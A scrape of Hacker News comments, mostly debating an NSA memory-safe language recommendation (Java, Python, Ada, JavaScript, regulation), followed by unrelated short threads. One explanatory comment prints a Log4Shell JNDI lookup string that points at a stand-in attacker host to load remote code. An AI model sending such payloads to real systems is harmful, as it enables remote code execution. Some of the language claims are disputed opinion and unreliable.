> In Java, the compiler inserts null checks before every single dereference and throws an exception for null references.

Doesn't OpenJDK install a SIGSEGV handler, and generate the exception from that on a null dereference?

(AFAIK, a lot of runtimes for GC'd languages that support thread-based parallelism do so anyway, because they can use mprotect to do a write barrier in hardware.)


> Doesn't OpenJDK install a SIGSEGV handler, and generate the exception from that on a null dereference?

I thought I had read that they explicitly don't do that, but I can't find it anymore. You may be right. I should have checked before saying that.

> (AFAIK, a lot of runtimes for GC'd languages that support thread-based parallelism do so anyway, because they can use mprotect to do a write barrier in hardware.)

That's true. I guess those implementations must do something more advanced than "throw a NullPointerException if the program segfaults," given their garbage collector runtimes also rely on that signal.


> I thought I had read that they explicitly don't do that

This is exactly what they do: https://shipilev.net/jvm/anatomy-quarks/25-implicit-null-che...

When this happens it'll cause a deoptimization and recompilation of the code to include the null check rather than rely on the signal handler repeatedly.


Thanks for the link!


Why is Python listed there and not other languages like Ruby, Javascript or Perl?


It’s the only scripting language listed — I suspect scripting languages weren’t the focus, but that it got special consideration and added to the list to not place the AI/ML R&D communities in an awkward spot. Of course they should move to something besides Python, but network effects give Python powerful inertia, and AI/ML is a strategic area.


Commenting bc I had the same question.

My impression of historical Python is that it is an old, partially arcane language that is now popular due to data science/AI; I would initially have thought it no better than those other interpreted languages. Python does these things well... mainly due to pandas/dataframes/Polars.

<btw, Perl? ;) >


Language-wise, Python is basically just Perl with its arms cut off and a bunch of makeup added. It's just very popular in the scientific community, so they have to add it.


Python does not have a lot in common with Perl language-wise, so this seems an odd statement.


Python was based off Perl, so yes it does have a lot in common with Perl.


Nope. That's not at all accurate.


How did you get that idea?


I don’t know how you can possibly come away with this conclusion after studying both languages. Maybe if your point of reference is an ancient version of Python?


Yes, it is, and current Python is basically just an object-oriented system hacked on top of ancient Python. The underlying elements beneath the syntax are basically all the same.


Python replaced Matlab too.


I think the familiarity when moving from Matlab to Python helps a lot with adoption.


Python is far more popular than the other two for non-web development.


I don't think Ruby is used a lot at the NSA; other than that, it's weird that it did not get mentioned.

They should've instead just said Python and similar languages.


No offense to Ruby, but if I were going to push people to change to a new language I would not recommend Ruby. It had its time of popularity and I feel like it's just a niche language now, surpassed by others.


> if I were going to push people to change to a new language I would not recommend Ruby

None of the alternatives except Go and Swift is new. Ruby has turned into robust, boring technology; that does not mean it's unworthy.

The Ruby team is still pushing the language's features and speeding up the runtime. Take a look at Ruby Ractors, for example.

I do have to agree that Ruby is more of a niche language now, thanks to Rails, but I'd say Ruby works very well for scripting and gluing together different systems.


From a memory safety perspective, I would say the same about Python. The libraries that make it popular are all written in C++, to my knowledge. Anyone not already using Python usually has better tools to choose from these days.


Because Python is widely used on the backend?


I would bet it's more unsafe to use Perl than C, on average.


Ada people scratching their heads....


Neither Ada nor Rust are completely memory-safe... and they are partially unsafe in completely different ways. But I guess people prefer the Rust explicitness.


Ada is safe if you never free memory explicitly. The story for reclaiming memory without GC was always a little weird, basically pool allocation by type. But it does bounds checking, counted strings, and has a reasonably rich type system that allows variants and things in a safe way.


Ada has Controlled types, so the memory reclaiming story can be similar to C++/Rust RAII. What it's missing compared to Rust is the lifetime and borrow checking.


How many of them are left? I thought it was very much a dead language


Far from it.

"SQL/PSM (SQL/Persistent Stored Modules) is an ISO standard mainly defining an extension of SQL with a procedural language for use in stored procedures... SQL/PSM is derived, seemingly directly, from Oracle's PL/SQL. Oracle developed PL/SQL and released it in 1991, basing the language on the US Department of Defense's Ada programming language. However, Oracle has maintained a distance from the standard in its documentation. IBM's SQL PL (used in DB2) and Mimer SQL's PSM were the first two products officially implementing SQL/PSM. It is commonly thought that these two languages, and perhaps also MySQL/MariaDB's procedural language, are closest to the SQL/PSM standard. However, a PostgreSQL addon implements SQL/PSM (alongside its other procedural languages like the PL/SQL-derived plpgsql), although it is not part of the core product."

https://en.wikipedia.org/wiki/SQL/PSM


As I understand, there's a very long tail of continued Ada use in military and aviation.

So depends on your definition of "dead"



It's still very popular in air traffic control. Some older NASA and military projects used it and are still in use.


There are still plenty of Ada devs around, but they're almost all in the DoD or working for defense contractors.


It is odd, since Ada is DoD's (bastard?) child and the NSA is part of the DoD, but with a little digging you get this from 1997 (with a singular mention of the word "safety"):

https://nap.nationalacademies.org/read/5463/chapter/3

tl;dr: it seems the software development world has changed from the days when the DoD was the "dominant" software developer, and Ada in the interim did not get adopted by the commercial sector (with safety-critical exceptions in aerospace, etc. noted).


What do we do about JavaScript?


Judging from HN, just use HTML instead.


HTML, the Programming language, right? https://news.ycombinator.com/item?id=38519719


Watch out Brainfuck, a challenger has arisen!


based and true.


Write JavaScript engines in memory-safe languages. I'd vote for Rust, as Rust's and JavaScript's APIs are pretty similar in style, structure, consistency, and security/other issues that are not memory safety.

On that note, try valgrind on existing JavaScript engines; you might be "entertained". (I certainly was, but that was some years back.)


How are Rust and JS APIs similar, and why would it matter?

AFAIK the only competitive JS engines written in memory safe languages are GraalJS and other JS-on-the-JVM runtimes. GraalJS has the advantage of being fully up to date, not having any memory unsafe code in it (the JIT compiler that makes it fast is a separate module, also written in a memory safe language, and the JS impl does not have low level code in it). And you can run it on SubstrateVM which is a virtual machine also written in a memory safe language, although of course small parts like the GC need to use unsafe features.

It also has other useful features like sandboxing and the ability to interop with other languages like Python or Java. Plus, it can actually sandbox native code as well because the "languages" that you can run on GraalVM include both wasm and more usefully LLVM bitcode, in which each individual C/C++ allocation becomes GC-managed and bounds checked.

So in terms of memory safety the Graal team are way ahead there.

(disclosure: I recently started part time work with the GraalVM team, but was a long term supporter before that)


Rust and JS - er in short, there's a lot more to security than "memory safety". But then I've been in groups burned by NPM hacks in the past. I've tried Rust some but it looks like the same problems yet again. I'm wary, and going to give it time to mature - it's not interesting enough on its own - especially for someone more used to embedded programming spaces (C centric spaces, for good reasons).

As for the second - good to know! Seriously appreciate knowing that - not sure if/when I'll need it myself, but it's good to hear, and good that it's visible here!


Most JavaScript engines are JIT-based, and that's hard to make safe; you'd need a complete proof that the emitted assembly is correct. It's similar to the problem of proving correctness for any compiler.


Oh, I've used such tests on other JIT-based languages, as well as non-JIT ones. None made valgrind put on quite so much of a show. I'm not sure I've ever seen less memory-safe codebases.


Kind of interesting that they didn't include it given python is there. (JS is not even mentioned in the document.) I guess they don't class it as a general purpose programming language? It's not as if we have other options in the browser, particularly, and while node can do a lot of stuff, it's got a clearly intended purpose. Or... maybe they consider it unsafe somehow, but that seems less likely.


This ain't that kind of movie.


Will we one day be able to use AI to make code memory safe?


Reviewing C/C++ code for memory safety is probably a good use case for LLMs actually. Writing memory safe code from scratch is a much bigger ask.


I bet many, many false alarms


Perhaps, but reviewing code for memory safety issues is a more well defined task than general code generation so LLMs can be more easily trained to get better at it.


[flagged]


Next thing they'll be giving requirements for people building bridges, houses, and gas and electricity fittings.

Seriously, I think it's long past time that software was regulated. It's a major part of modern society, and as far as I'm aware, most people aren't opposed to building standards in principle.


If software had been regulated like engineering we'd still be writing horrible OO-heavy enterprise Java style code like in the 90s and UML would be mandatory.


We'd probably be using Ada. The government used to mandate that contractors write software in Ada, but they stopped because of the pushback they got; now they also use C++.


They'll "regulate" a bunch of controls to make corporations more efficient at making money, while limiting their liability when they get hacked and increasing the barrier to compete with them.

If we want a safer internet, make them carry insurance against data breaches and fine them a fixed amount, say $1500, for each identity they leak, paid immediately upon proof of pwnage.


The wild west had a lot less danger and death than Hollywood makes it out to seem. Likewise, I'm going to miss the internet and computing as we know it now when it's regulated to shit like everything else. Nothing nice ever lasts.

Complete safety, or actual freedom. Pick one. You can't have both.


>Complete safety, or actual freedom. Pick one. You can't have both.

False dichotomies aren't helpful and underscore lazy thinking. The real world is full of nuance, and so should our policies. Using a risk-based approach is probably more appropriate than an all-or-nothing policy.


> Pick one

Or, maybe pick a point on a spectrum.

That seems more realistic, because I'd argue you can't really have "Complete Safety" or "Actual Freedom" (by which I am guessing some people would interpret 'actual' as 'complete').


Please don't insult the 2014 government safety film 'A Million Ways to Die in the West'.


People figured out how to build buildings prior to creating building codes


And many buildings were built deliberately poorly to make a quick buck - or caught fire too easily, or fell down in minor earthquakes (or, worse, damaged other property/people). People's homes are a major financial commitment and can ruin people if they're not up to scratch.

The regulations are to ensure the 10% of bad builders/developers don't ruin people's lives.


And yet, poorly built buildings are still being built, but at least now it is much harder and much more expensive for a person to build their own house, and for small construction companies to compete with giant monopolies. Yay!


Well, it's not black and white.

Regulation hinders progress and makes things more expensive. But no regulation raises costs and hinders progress too: it basically creates a situation of very low trust, and low trust is extremely expensive for customers/buyers who are not domain experts. This also makes them overcautious and conservative. One needs a balance and lots of nuance to make a reasonably well functioning market/system.

The case against regulation of the software business is not that "regulation is bad". It's that programming and software are a very new and rapidly evolving area of human activity. It's not nearly as well understood as building houses. Written and unwritten standards and best practices are constantly changing. The field is subject to very strong fashion-driven "crazes".

(Just look at how many new languages are still being created. Most don't become as widespread as C++ or Java or Python, but many do find their niche, and very many are in use to some extent. This indicates that the "language Holy Grail" is nowhere to be seen yet.)

In software, there is very little consensus between domain experts on most issues. This is very unlike construction and house building, where some new materials and techniques are introduced too, but the basic principles are well understood and calculable, and where agreement among experts is usually quite achievable.

So arguably it's nearly impossible to create good regulation at this stage, at least outside of certain special niches. This is very different from building codes and stuff.

Of course there is also bad regulation. The bureaucracy likes to expand their control indefinitely, wants to regulate things that should not be regulated, thus (if unchecked) creating very bad regulation. Well, that's the case for checks and balances, for the society to fight back. But "this regulation is bad and needs to be changed" is a much more mature position than "we need no f*g regulation!", in my opinion...


"Poorly build [sic] buildings" depends on context. Even low-quality builds in the US are relatively safe. It's disingenuous to imply they are of the same quality as in countries where building codes are effectively non-existent.


https://en.wikipedia.org/wiki/Great_Fire_of_London

Building a building without regulation is easy. Building a city that doesn't burn to the ground every time someone knocks over an oil lamp is not.


And people figured out how to fly prior to the FAA. So what?



People also died, a lot.


Define "figured out." Did people know how to cobble together a structure? Of course. Did they inherently know all the best practices that reasonably balance safety, cost, and timeliness? Probably not.

The same can be applied to software. An ability to cobble together a "Hello World" does not necessarily mean I want you programming a controls system on a nuclear power plant.


It is ridiculous to equate a recommendation and a mandate.


Well, there are groups that want a government mandate for this, though.

If you don't know, Consumer Reports is paid by groups interested in encouraging the government to apply regulations to certain areas. A bike helmet manufacturer may pay them to create a report, host events, and otherwise lobby on their behalf to e.g. create regulations about people needing to use bike helmets.

It is my understanding that many Rust advocates, security researchers, and members of the Internet Society are effectively advocating/lobbying for partial government mandates of 'memory-safe languages'[0]:

> It’s not yet possible for government procurement to only buy memory-safe software. For example, you can’t say routers must be memory-safe top to bottom because no such products currently exist. But it may be possible for the government to say that newly developed custom components have to be memory-safe to slowly shift the industry forward.

> This would require some type of central coordination and trust in that system. The government could ask for a memory safety road map as part of procurement. The map would explain how the companies plan to eliminate memory-unsafe code in their products over time. The carrot approach for memory safety may include not just decreased future costs in cybersecurity, but also reliability and efficiency.

[0] https://advocacy.consumerreports.org/wp-content/uploads/2023...


Rust programmers want the government dollarinos? Amazing. It did feel a bit coordinated.


"${LANGUAGE} programmers" aren't really a thing. Our important skills translate fairly cleanly between ecosystems.


Ok fine, then to quote the parent to whom I was responding, “Rust advocates.”

I am willing to bet that most of those “Rust advocates” are programmers who code in Rust but I’m fine with not calling them that. I agree that good programmers should be able to work in different languages, operating systems, countries.


My point is that even in a world where the government mandates that certain applications that would otherwise be written in C++ are instead written in Rust or Swift, we wouldn't see some massive loss of work for people who currently program in C++.


We may see that the 'next generation' of 'better' programming languages (the next Swift, the next Rust, etc.) cannot easily/readily/practically become certified for government use, though, leading to less innovation long term.

For example, if this had already happened, we might find today that Java is certified for use but Rust is simply not allowed, while Swift perhaps is because of Apple's backing of it.


Ok, that’s a fair point. Imagine you’re Bjarne Stroustrup: sure, he doesn’t consider himself a C++ programmer, and he isn’t worried about his employment prospects, but he still has a vested interest in this issue.


It is, but it doesn't mean folks won't.


I don't understand the point you're trying to make. You're the person who wrote it would be mandated, and now you're admitting it's a ridiculous position to take.

If you have some point to make please do so earnestly. Layering in levels of irony makes any point you're trying to make difficult to understand or follow, even if labelled with /s.

This is going off-topic, but there is a style of internet arguing that I have come to seriously dislike. It is one where instead of someone making a point, they make the point they wish to detract and simply flag that they are being ironic. In doing so they don't actually advance the point they're trying to make, they assume that the audience already understands and is sympathetic to that point, so they simply put up a target to scoff at.

I'm not sure if that's what you're doing here, or if you're just struggling to make a point about worrying about government intrusion into private business.


I guess the GP is trying to say that those languages will enter the compliance checklist of some unavoidable rule, and that recommendation will turn into an effective mandate.

Which is a quite real possibility. For example, there are plenty of places out there that can't stop expiring passwords every 1 or 3 months because it's in one of those lists. But I do agree that complaining about the recommendation because of this is off topic; the focus should be on the rule that actually mandates it.


Oh boy... Nothing is mandated here. These are just suggestions from experts. Don't take them if you don't want to.


Wait until government contract projects mandate them in the fine print. It's a serious enough signal for anyone interested in doing any software-related business with the government; for them, this is nearly the same as 'mandated'.


I for one would prefer that government projects set this kind of requirement. I don't want my government software implemented in C++. If they are the customer they should require that the projects do everything they can to eliminate bugs caused by memory unsafety. Using a Memory Safe language is one of the easiest ways to do so.


There actually was a mandate for government work in the past with Ada. This is not a mandate.

Even that mandate did not appear to fundamentally change the landscape beyond government work.


That’s just a customer with requirements... like all customers.


But, on the other hand, it’s not. The government is a virtual monopsony. Normally, when one customer has unappealing requirements, you can choose not to serve them. The federal government saying "don't hire C devs" will hurt C devs, and C devs will be understandably dismayed by this.


But this differs from the above statement that specifically referred to "government-related business". The "business" part implies a contract but it doesn't mean all non-govt contracts need to follow suit.


Likely only if you're building government code.

Worked out well enough with Ada in 1978. https://en.m.wikipedia.org/wiki/Ada_(programming_language)#H...


I agree that it is not a mandate yet. The NSA does have some interesting insight and expertise in this area, though.

Time and time again, we see experts make recommendations, then legislation and rules make it mandatory.

A glaring example is NIST's special publications. NIST itself makes no rules, mandates and such. Yet mandates (e.g., DFARS, DEAR) point to those recommendations as the requirement.

Right now there are two of these playing out in the cybersecurity field - zero trust and passwordless authentication.

So to those who downvote this comment: you are right, it is not a mandate. To those who upvote it: you are also right, it is likely to become one.


Easier to decompile.


Some software needs to be NSA-certified. If you need a government certification, you get government mandates.

Though at this point, this is a recommendation, not a mandate.


Conspiracy: The NSA has compromised the runtimes of those languages to run arbitrary payloads and spy on everything that runs through them. I mean, "catch terrorists".


In unrelated news, security researchers have discovered a new class of vulnerabilities common to all memory safe languages

;)


>Java

Java is a pest fest for exploits.

From that list, I'd choose Go, C# (though I'm not totally sure, because of the AOT/JIT situation), and Rust.


>Java is a pest fest for exploits.

Sure, if you haven't used it since the nineties and pay zero attention to new development.


I’ve only used Java in the last ten years. I helped deal with the log4j incident at a few companies. We specifically had to patch systems that were running newer versions of Java and older versions of Spring. The exploit relied on a new method of adding code to the JVM at runtime that newer versions of Spring had locked down to prevent people from using.

I’ve never seen an explanation for why this mechanism was added or what it was supposed to enable — besides enabling new exploits.

Every time I’ve seen Java used for a safety critical application the justification has been entirely based on the fact that it has cryptographic libraries that are widely certified for safety by enterprises. The security people on our side were… resigned.
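
For anyone who hasn't seen it spelled out, here is a minimal sketch of the pattern behind that incident (Log4Shell, CVE-2021-44228), assuming a vulnerable log4j-core 2.x (pre-2.15) on the classpath. The class and method names below are purely illustrative, not from any real codebase:

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    public class LoginHandler {
        private static final Logger LOG = LogManager.getLogger(LoginHandler.class);

        // Hypothetical handler: userAgent comes straight from an HTTP header.
        public void handle(String userAgent) {
            // On vulnerable versions, a value such as
            // "${jndi:ldap://attacker.example/a}" is not treated as plain text:
            // log4j resolves the JNDI lookup at log time, which can fetch and
            // run a remote class; that's the "adding code to the JVM at
            // runtime" part.
            LOG.info("Login attempt, user agent: {}", userAgent);
        }

        public static void main(String[] args) {
            new LoginHandler().handle(args.length > 0 ? args[0] : "curl/8.0");
        }
    }

(Later log4j releases disable message lookups by default, which is why simply logging an attacker-controlled string is no longer enough to trigger it.)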


The fact that everyone in these comments points at the one major incident in years is more telling than anything else.


Right, there haven't been crazy Java exploits going around the past few months, only Rust and Go!


The Log4j affair was last year. Kinda funny how HN still bitches about node dependencies and claims Java's are more mature.



Thanks. There's a follow up at https://blog.paulhankin.net/fibonacci2/


For a narrower but deeper treatment of violence (and war) alone, Pinker's https://en.wikipedia.org/wiki/The_Better_Angels_of_Our_Natur... is well worth a read.


While it's appealing to believe Pinker, his treatment of statistics and probability of war has been debunked. For a mathematical analysis of the history of war see Cirillo and Taleb's paper "On the statistical properties and tail risk of violent conflict" (https://www.fooledbyrandomness.com/violence.pdf).

From the paper: "Accordingly, the public intellectual arena has witnessed active debates, such as the one between Steven Pinker on one side, and John Gray on the other concerning the hypothesis that the long peace was a statistically established phenomenon or a mere statistical sampling error that is characteristic of heavy-tailed processes, [16] and [27]–the latter of which is corroborated by this paper."


Unsure, but maybe related to newer considerations/nuance:

Scaling theory of armed-conflict avalanches https://www.santafe.edu/news-center/news/avalanche-violence-...

Podcast: https://complexity.simplecast.com/episodes/39-9ugXDtkC


Skeptically.

Pinker has been called out for cherry-picking by numerous other authors, particularly Graeber and Wengrow, a duo of academic anthropologist and archaeologist respectively. Another is Christopher Ryan. In both cases, well-reasoned counterarguments are posed against Pinker's reasoning.


The only thing I know about the book is from this article https://acoup.blog/2021/10/15/fireside-friday-october-15-202... which recommends Azar Gat, War in Human Civilization instead.


Anthropic at https://x.com/anthropicai/status/1709986949711200722

> The fact that most individual neurons are uninterpretable presents a serious roadblock to a mechanistic understanding of language models. We demonstrate a method for decomposing groups of neurons into interpretable features with the potential to move past that roadblock.


The author does refer to Elixir further down:

> UPD: Erlang/Elixir seem to be doing the right thing, too.


Updated a day after it was mentioned here :-)

https://github.com/tonsky/tonsky.me/commit/5fbbb373025be3758...


I don't think I'm alone in considering blinking keyboard cursors/carets the original sin of this.

Here's a long-running collection of how to disable flashing cursors everywhere, from vi to VS Code: https://jurta.org/en/prog/noblink

> Software development is not an easy task, and often after a painful process of writing a program developers feel they should share their pains with users, so they put a part of own sufferings onto the shoulders of users in a method similar to the Chinese water torture - blinking cursors.
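
For one concrete example (just a single data point, and defaults shift between versions, so check your editor's docs): in VS Code this is a single entry in settings.json, where "solid" turns blinking off entirely.

    {
      // Stop the text cursor from blinking in the editor.
      "editor.cursorBlinking": "solid"
    }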


Cursors are fine to me, and frankly important. Flashing is "LOOK HERE IT'S IMPORTANT YOU KNOW WHAT'S HAPPENING HERE" and what happens when I press almost any button is a solid reason for grabbing my attention. I shouldn't have to search in a big pile of thin lines to see the specifically slightly differently shaped thin line to know what's going to happen when I type - let my visual system use the optimised "MOVING" alarms to let me know.

Making me hunt or test where my cursor is by making a change is far worse to me.

Interesting to know that some people find it hard. Does the default behaviour I see while typing (no blinking unless you pause) help?


What I would love to be standard in all product launches like this would be to have a mailing list per integration or, as with this, programming language.

I want to be able to drop my email address and only hear back when support for $MY_FAVE_LANG is available.


It's a bit buried, but if you go to https://app.infield.ai/hn and click "I don't use Ruby" we'll ask for your email/language and put you on our list.



I believe the main article ends at the "Share" button, then there's a separate ad or section about the educational models.


Haven't seen that format before. Substack ordinarily scatters various buttons/images/signups etc through an article so I'm accustomed to skipping over them to get to the next paragraph.

The subtitle of the article specifically mentions Educational Models, creating an expectation they will be covered as part of the subject matter. But then it's tacked on without any context or reason. Total non-sequitur.

